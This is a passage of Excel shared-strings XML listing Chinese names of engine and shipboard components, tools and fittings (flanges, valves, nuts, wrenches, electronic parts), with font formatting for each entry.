    <r>
      <t>ECS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中英文</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本地控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透明树脂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铲电缆接线片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子标号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硅脂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘电阻</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示器电源供应</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角盘头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计算机硬件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主控面板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>散热片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闪存</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢印</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口适配器</t>
    </r>
  </si>
  <si>
    <r>
      <t>LCD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示器</t>
    </r>
  </si>
  <si>
    <r>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>随动装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轨迹球鼠标</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>路由器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电池</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇附属件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冗余模块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气箱附属件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气箱装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动调谐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据采集器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电阻器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二极管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电容器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PCB</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>晶体管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数字微控制器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料清单</t>
    </r>
  </si>
  <si>
    <r>
      <t>PCBA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头及连杆工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套管保持工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱，工具布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方钢</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢球</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能参数</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>GRIP 253.6*Ф6.0</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊佩恩锁定螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压锁紧用螺帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>佩恩锁定环</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形螺母</t>
    </r>
  </si>
  <si>
    <r>
      <t>WFG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>龙头注油器</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
  </si>
  <si>
    <r>
      <t>Phildas</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
  </si>
  <si>
    <r>
      <t>ISO-M</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自锁六角螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢六角螺母</t>
    </r>
  </si>
  <si>
    <r>
      <t>SRG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆用埋头螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆支撑总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱用管件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱用螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱用文本</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆布置（基座与支柱）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基座与支柱总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱与螺栓总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱装配例子</t>
    </r>
  </si>
  <si>
    <r>
      <t>MK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子标准，说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝钢管（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝精密钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精密钢管</t>
    </r>
  </si>
  <si>
    <r>
      <t>SRG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹接套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管底</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气测试阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带绝缘手柄的内螺纹压力表阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个螺纹接套和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个六角螺母的角阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹直通阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹内螺纹压力表阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形座蝶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>翻边法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN10</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头内法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN40</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN10</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN16</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN10</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN16</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN6</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN6</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰（椭圆）</t>
    </r>
  </si>
  <si>
    <r>
      <t>PN2.5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的方形法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管用法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活动扳手接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造弯螺杆卸扣</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸扣用螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角孔用扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角套筒扳手箱</t>
    </r>
  </si>
  <si>
    <r>
      <t>N549H1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手设置用表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单头扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单头冲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梅花扳手和开放式扳手用扳手杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环冲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梅花扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合式扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准销，摘要</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护环图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管弯曲半径</t>
    </r>
  </si>
  <si>
    <r>
      <t>MK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管的法兰装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢的硬度比较</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
